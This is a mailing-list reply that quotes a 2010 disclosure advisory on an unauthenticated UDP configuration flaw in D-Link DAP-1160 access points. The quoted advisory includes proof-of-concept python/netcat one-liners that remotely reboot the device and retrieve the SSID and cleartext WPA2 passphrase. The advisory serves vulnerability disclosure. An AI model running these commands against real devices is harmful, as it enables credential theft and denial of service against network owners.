Date: Mon, 28 Jun 2010 10:29:34 -0400
From: Gary Baribault <gary@...ibault.net>
To: full-disclosure@...ts.grok.org.uk
Subject: Re: IS-2010-004 - D-Link DAP-1160 Unauthenticated
 Remote Configuration

Is that UDP 2003 open on the WAN interface as well?

Gary Baribault


On 06/28/2010 09:50 AM, Cristofaro Mune wrote:
> Security Advisory
>
> IS-2010-004 - D-Link DAP-1160 Unauthenticated Remote Configuration
>
>
>
> Advisory Information
> --------------------
> Published:
> 2010-06-28
>
> Updated:
> 2010-06-28
>
> Manufacturer: D-Link
> Model: DAP-1160
> Firmware version: 1.20b06
>           1.30b10
>           1.31b01
>
>
>
> Vulnerability Details
> ---------------------
>
> Public References:
> Not Assigned
>
>
> Platform:
> Successfully tested on D-Link DAP-1160 loaded with firmware versions:
> v120b06, v130b10, v131b01.
> Other models and/or firmware versions may be also affected.
> Note: Only firmware version major numbers are displayed on the
> administration web interface: 1.20, 1.30, 1.31
>
>
> Background Information:
> D-Link DAP-1160 is a wireless access points that allow wireless clients
> connectivity to wired networks.
> Supported 802.11b and 802.11g protocols. WEP, WPA and WPA2 supported.
>
>
> Summary:
> Unauthenticated access and modification of several device parameters,
> including Wi-Fi SSID, keys and passphrases is possible.
> Unauthenticated remote reboot of the device can be also performed.
>
>
> Details:
> DCCD is an UDP daemon that listens on port UDP 2003 of the device, that
> is likely used for easy device configuration via the DCC (D-Link Click
> 'n Connect) protocol.
> By sending properly formatted UDP datagrams to dccd daemon it is
> possible to perform security relevant operation without any previous
> authentication.
> It is possible to remotely retrieve sensitive wireless configuration
> parameters, such as Wi-Fi SSID, Encryption types, keys and passphrases,
> along with other additional information.
> It is also possible to remotely modify such parameters and configure the
> device without any knowledge of the web administration password.
> Remote reboot is another operation that an attacker may perform in an
> unauthenticated way, possibly triggering a Denial-of-Service condition.
>
>
> POC:
> - Remote reboot
> python -c 'print "\x05" + "\x00" * 7' | nc -u <IP_ADDR> 2003
>
> - Retrieving Wi-Fi SSID
> python -c 'print "\x03" + "\x00" * 7 + "\x21\x27\x00"' | nc -o ssid.txt
> -u <IP_ADDR> 2003
> cat ssid.txt (cleartext SSID displayed after "21 27 xx xx" in the
> received datagram)
>
> - Retrieving WPA2 PSK
> python -c 'print "\x03" + "\x00" * 7 + "\x23\x27\x00\x00\x24\x27\x00"' |
> nc -u -o pass.txt <IP_ADDR> 2003
> cat pass.txt (cleartext WPA2 PSK displayed after "24 27 xx xx" in the
> received datagram)
>
>
> Impacts:
> Remote extraction of sensitive information
> Modification of existing device configuration
> POssible Denial-of-Service
>
>
> Solutions & Workaround:
> Not available
>
>
>
> Additional Information
> ----------------------
> Timeline (dd/mm/yy):
> 17/02/2010: Vulnerability discovered
> 17/02/2010: No suitable technical/security contact on Global/Regional
> website. No contact available on OSVDB website
> 18/02/2010: Point of contact requested to customer service
> ----------- No response -----------
> 26/05/2010: Partial disclosure at CONFidence 2010
> 28/06/2010: This advisory
>
>
> Additional information available at http://www.icysilence.org
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>


Content of type "text/html" skipped

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists